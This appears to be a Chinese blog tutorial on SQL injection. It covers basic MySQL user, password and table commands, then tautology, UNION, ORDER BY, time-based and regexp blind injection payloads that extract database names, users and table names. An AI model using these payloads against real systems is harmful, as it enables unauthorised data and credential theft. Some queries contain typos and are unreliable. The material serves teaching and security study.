SQL注入原理(基本语句/高级查询/高级注入/Mysql账号密码修改)

已于 2024-07-17 18:48:22 修改
阅读量465 收藏 8
点赞数 5
文章标签: sql 数据库 算法 正则表达式 mysql
于 2024-06-21 08:58:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ki2637192651/article/details/139847934
版权

        SQL注入 (Structured Query Language lnjection)技术在国外最早出现在1999年,我国在2002年后开始大量出现,目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述:脚本注入式的攻击、恶意用户输入用来影响被执行的SQL脚本SQL注入,就是攻击者通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询宇符串,最终达到让后台数据库执行恶意的SQL命令的目的,并根据程序返回的结果,获得某些攻击者想得知的数据。所谓SQL注入,就是通过把恶意的SQL命令注入到正常http请求或其他有进行数据库交互的参数中进行提交,最终操纵数据库服务器执行非授权SQL命令的攻击行为。

       在进行SQL注入学习前,建议大家去看一下我之前整理的一篇Mysql基本语句操作及命令,还有对数据库的基本结构进行一定的了解。

        SQL注入的方式有很多,本内容呈现部分方式。以下的一些内容主要是如何实现SQL注入的高级语句学习及应用,大家应学会去自主理解语句的结构与逻辑函数,在练习应用中融会贯通,懂得应变,不建议大家去死记所有代码,懂得其原理与方法逻辑,学会判别才是最重要的,多加练习才是最好的方式。

先简单带大家熟悉一下Mysql的一些基本操作:

一.用户的创建/密码/权限管理(create/alter/set/grant/revoke)

1.用户创建/权限管理
=================================================================================================
# 使用CREATE USER创建
# CREATE USER 'username'@'host' IDENTIFIED BY 'password';
-------------------------------------------------------------------------------------------------
# 创建用户使用“%”允许通过任何主机连接
# CREATE USER 'newuser'@'%' IDENTIFIED BY 'mypassword';
=================================================================================================


2.密码修改
=================================================================================================
# 使用ALTER
# ALTER USER 'username'@'host' IDENTIFIED BY 'new_password';
# FLUSH PRIVILEGES;
-------------------------------------------------------------------------------------------------
# 使用SET语句修改密码
# SET PASSWORD FOR 'username'@'host' = 'new_password';
# FLUSH PRIVILEGES;
-------------------------------------------------------------------------------------------------
# 直接mysql环境外修改
# mysqadmin -u username -p old_password password new_password
=================================================================================================


3.权限管理(增/删/查)
=================================================================================================
# 查看用户权限
# show grants for aplexia@host\G;
-------------------------------------------------------------------------------------------------
# 增加权限
# GRANT SELECT,INSERT,DELETE ON *.* TO aplexia@host;
-------------------------------------------------------------------------------------------------
# 取消权限
# REVOKE DELETE ON *.* FROM aplexia@host;
=================================================================================================

 二.Mysql数据库相关信息查看

4.查看版本号
=================================================================================================
# select version(),current_date;
=================================================================================================

5.查看日志文件
=================================================================================================
# show variables like "%log";
=================================================================================================

6.查看用户/密码/主机
=================================================================================================
# select user,password,host from mysql.user;
=================================================================================================

三.表内外结构的增/删/改(基础操作必须掌握,不清楚的小伙伴可查看之前的文章学习)

7.增(CREATE/INSERT)
=================================================================================================
# insert into role(roleid,rolename) values('1','manager');
=================================================================================================

8.删除(delete/drop)
=================================================================================================
# 删除表
# drop table exams;
-------------------------------------------------------------------------------------------------
# 快速删除表
# truncate papers;
-------------------------------------------------------------------------------------------------
# delete from users where roleid=1;
=================================================================================================
#移动表
# RENAME TABLE mysql.agroup TO agroup_account.agroup;
=================================================================================================
9.修改(update/alter)
=================================================================================================
# 修改表名字
# alter table old_tablename rename new_tablename;
-------------------------------------------------------------------------------------------------
# 修改表结构
# alter table tablename modify name varchar(20);
# alter table tablename change name new name varchar(20);
# alter table tablename add new_word type_word after name;
-------------------------------------------------------------------------------------------------
# 将password字段全部更改为123456
# update user set password=123456;
# update user set password=111 where roleid=1;
=================================================================================================

四.数据库/表的查看与筛选

10.查(show/desc/select)
=================================================================================================
# 查看表结构
# desc tablename/G;

# 查看所有表
# show tables;
-------------------------------------------------------------------------------------------------
# 查看表内容,限制在1-2条
# select * from user limit 1,2;

# 查看表内容,限制在前5条
# select * from user limit 5;

# 查询指定字段
# select word_1,word_2 from table_name;

# 查询所有数据
# select * from table_name;

# 指定条件
# select * from table_name where word_1=option_word;

# 多个条件
# select * from table_name where word_1>100;
=================================================================================================

五.数据库的查找排序法(order by)

11.排序(order by)
=================================================================================================
# 根据字段排序
# select * from user order by word_1;

# 根据第一个字段进行排序
# select * from user order by 1;

# 根据第二个字段排序
# select * from user order by 2;
=================================================================================================

六.联合查询(union)

12.联合查询(union)
=================================================================================================
# 将两个具有相同字段数量的查询语句的结果,以“上下堆叠”的方式合并为一个查询结果
# select roleid,username from user
    -> union 
    -> select roleid,rolename from role;

# 两个select语句的查询结果字段数必须一致
# 通常字段类型具有一致性

# 使用distinct “自动消除重复行”
# 使用all 允许显示重复行
=================================================================================================

七.进阶SQL语句注入,接下来的语句大家要掌握其基本格式与逻辑,以及可使用的各类函数即可

=================================================================================================
# select * from user where roleid='1';
# select * from user where roleid='1' or '1'='1'; //为真,返回all
# select * from user where roleid='1' or '1'='2'; //为假,返回roleid='1'
# select * from user where roleid='1' order by 6; //判断SQL语句输出列数
# select roleid,username,major from user order by 1; //根据所选择字段的第一个字段进行分类排序
-------------------------------------------------------------------------------------------------
# select database(); //查询当前数据库名
# select version(); //查询当前数据库版本信息
# select user(); //查询当前用户
# select @@version_compile_os; //查询当前主机系统
=================================================================================================

八.联合注入(union)

14.联合查询猜字段
=================================================================================================
# select * from user where username='222' union select 1,2,3,4,5,6,7; //可以知道一共有7个字段
=============================================================


15.联合查询数据库信息
=================================================================================================
# select userid,roleid,username from user where username='222' union select database(),version(),user();
# select userid,roleid,username,password from user where username='222' union select database(),version(),user(),@@version_compile_os;
=================================================================================================

九.order by嵌入条件注入

16.order by注入
=================================================================================================
# select * from user order by 1;
# select * from user order by 2;
# select * from user order by 3; //通过此返回值可判断表中字段数量
=================================================================================================


17.order by嵌入条件语句
=================================================================================================
# 如果1=1成立,则返回依据name返回
# select * from user order by IF(1=2,roleid,username);

# 如果1=2不成立则根据username返回
# select * from user order by IF(1=2,roleid,username);
-------------------------------------------------------------------------------------------------
# select * from user order by IFNULL(NULL,roleid);
# select * from user order by IFNULL(NULL,username);
-------------------------------------------------------------------------------------------------
# 如果1=1成立,则依据第一个字段返回
# select * from user order by IF(1=1,1,(select 1 union select 2));
# 如果1=2不成立,则返回(select 1 union select 2),返回错误
# select * from user order by IF(1=2,1,(select 1 union select 2));
-------------------------------------------------------------------------------------------------
# select * from user order by(select 1 regexp if(1=1,1,0x00)); //返回值
# select * from user order by(select 1 regexp if(1=2,1,0x00)); //返回错误
# select * from user order by(select 1 regexp if(1=1,1,0));
=================================================================================================

十.基于时间的注入

18.基于时间的盲注
=================================================================================================
# select * from user order by if(1=1,1,sleep(2)); //1=1成立,返回值1
# select * from user order by if(1=2,1,sleep(2)); //1=2不成立,执行slepp(2),此时可以明显看到返回延迟
=================================================================================================

十一.Regexp函数(正则表达式)

19.regexp函数(正则表达式运用)
=================================================================================================
# select 1 regexp 1; //此时为真返回1
# select 1 regexp 0; //此时为假返回0
# select 1 regexp 4; //此时为假返回0
# select 1 regexp 5; //此时为假返回0

# 可以看出仅有都为1才会输出1
=================================================================================================

十二.数据猜解

20.数据猜解
=================================================================================================
# select roleid from user order by(select 1 regexp if(substring(username(),1,1)='o',1,0x00));
# select roleid from user order by(select 1 regexp if(substring(username(),1,1)='e',1,0x00));
# select roleid from user order by(select 1 regexp if(substring(username(),1,1)='q',1,0x00));
# select roleid from user order by(select 1 regexp if(substring(username(),1,1)='r',1,0x00));

# 对用户名进行分割,从第一位开始取1位对‘o’进行比较,相同则成立,字母暴力猜解,得到用户名
=================================================================================================

十三.获取当前数据库表

21.当前数据库下的所有表
=================================================================================================
# 列举出当前数据库下的第一个表
# select table_name from information_schema.tables where table_schema=database() limit 0,1; 

# 列举出当前数据库下的第二个表
# select table_name from information_schema.tables where table_schema=database() limit 0,2;
=================================================================================================

十四.猜解数据库表名

22.猜解数据库表名
=================================================================================================
# select name from user order by (select 1 regexp if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='r',1,0x00));

# select name from user order by (select 1 regexp if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='s',1,0x00));

# 重复上面步骤可以同样的方式对数据库名进行暴力破解

# select name from student order by(select 1 regexp if(subtring((select column_name from information_schema.columns where table_schema=database() and table_name='student' limit 0,1),1,1)='i',1,0x00));
=================================================================================================

以上内容大家可多加练习慢慢深入,网上也有一些工具可以帮助大家实现自动化SQL注入,burpsuite,Sqlmap等。

ApLinuxor
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 8127
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
SQL注入攻击三部曲之高级
Oscar.Zhang
10-15 3952
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。   经过了入门篇和进阶篇的学习,相信诸位想要破解一般的网站是没有什么问题了,但是先别得意。正所
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1892
注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
mysql 注入 修改密码_SQL注入-二次注入修改其他用户密码
weixin_30129025的博客
01-19 765
二次注入1、使用特殊的SQL符号注册账号$username= mysql_escape_string($_POST['username']) ;$pass= mysql_escape_string($_POST['password']);$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")...
系列2:5、sql注入之高权限注入
qq_44704184的博客
03-25 3861
sql注入之高权限注入数据库中区分有数据库系统用户与数据库**普通用户,**二者的划分主要体现在对一些高级函数与资源表的访问权限上。直白一些就是高权限系统用户拥有整个数据库的操作权限,而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接,会区分系统用户链接与普通用户链接;当多个网站存在一个数据库的时候.root就拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可
sql注入修改
ray的博客
07-31 1529
in 标签 $ 修改为# 原语句: <if test="ids != null and ids != ''">and ID in (${ids}) </if> 修改后 <if test="ids != null and ids != ''">and <foreach collection="cdt.ids" index="index" item="item" open="(" separator="," close=")"> .
sql注入初试:找到可注入的地方,获得数据库信息,修改数据库
pigHead_chen的专栏
11-02 3589
首先,听说某公司的网站被注入了,我也来试试。   该网站是.net的。但url本应该是.aspx?a=a&b=b。但是好像被rewrite过了,显示.com/che_a~b/。这个不好办。 先查看页面源码,发现里面有很多ajax异步获取更新信息的,并且url未rewrite。找了一个拼好“http://abc.com/ajax/cc.aspx?a=a&b=b”。 找到D盘下的python.
SQL注入基本原理
DM766924的博客
09-09 3109
SQL注入基础原理: 1)SQL注入概念及产生原因: 当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2)SQL注入的本质: 把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则 3)SQL注入的两个关键点: 1,用户能控制输入的内容; 2,web应用把用户输入的内容带入到数据库执行; SQL注入基础危害: )盗取网站的敏感信息; )绕过网
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1240
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
sql注入高级
01-11
了解丌同数据库注入以及注入的类型,比如select注入,insert注入, json注入,一些注入防护代码等等。 了解及学习注入绕过的手法,掌握服务器,应用,数据库的bypass 手法,学会编写bypass waf代码 。
SQL注入高级进阶
06-04
SQL注入高级进阶
网页注入 mysql密码_通过SQL注入获得网站后台用户密码
weixin_39926749的博客
01-19 1313
通过 SQL 注入攻击,掌握网站的工作机制,认识到 SQL 注入攻击的防范措施,加强对 Web 攻击的防范。一、实验环境(1) 下载并安装WAMP,文件夹下的wampserver2.2d32位(2) 运行python漏洞利用脚本的环境,需要安装selenium库及浏览器对应的ChromeDriver版本二、实验准备(1)了解网站的运行机制和原理。(2)了解 asp、php、jsp 或者 asp.n...
sql注入--通过修改数据完成注入--一文详细讲解
贤鱼的博客
09-20 952
修改数据,完成注入
代码审计&细谈SQL注入修改八遍,只为真正让你学会】
chengman3837的博客
02-14 136
一、前言 大家好 我是Monkey。今天给大家带来的是普通的SQL注入 第一次发帖 好紧张 进入介绍吧! 二、介绍:SQL注入是什么? SQL 注入指的是通过构建特殊的输入作为参数传入 Web 应用程序,而这些输入大都是 SQL 语法里的一些组合,通过执行 SQL 语句进而执行攻击者所要...
全站防SQL注入类的修改版本
weixin_33901843的博客
11-26 143
值得一提的是:如果使用全局性的检验方式,则在开发之初无需考虑Sql注入的情况 /// <summary> /// 防SQL注入检查器 /// </summary> public class SqlChecker { //当前请求对象 private HttpRequest request; //当前响应对象 private ...
SQL增删改查、SQL注入、事务
kevineatsfish的博客
10-13 1491
SELECT * FROM user WHERE name=”abcd” and password=”“; 当password设置为1234” or “1”=”1”; SELECT * FROM user WHERE name=”abcd” and password=”1234” or “1”=”1”; 所以在JDBC中,使用?替代参数事务写法:将获取到的连接的自动提交关闭就OK Connec
SQL注入(一)mysql数据库基础
最新发布
shirlly_的博客
04-10 968
sql注入基本原理mysql数据库查询
SQL注入攻防:深入理解与sqlmap实战
SQL注入基本原理 SQL注入主要发生在应用程序未对用户输入的数据进行充分验证和过滤的情况下。当用户输入的数据被直接拼接到SQL查询语句中时,恶意的输入可能导致原本合法的SQL命令变成危险的命令。例如,一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ApLinuxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值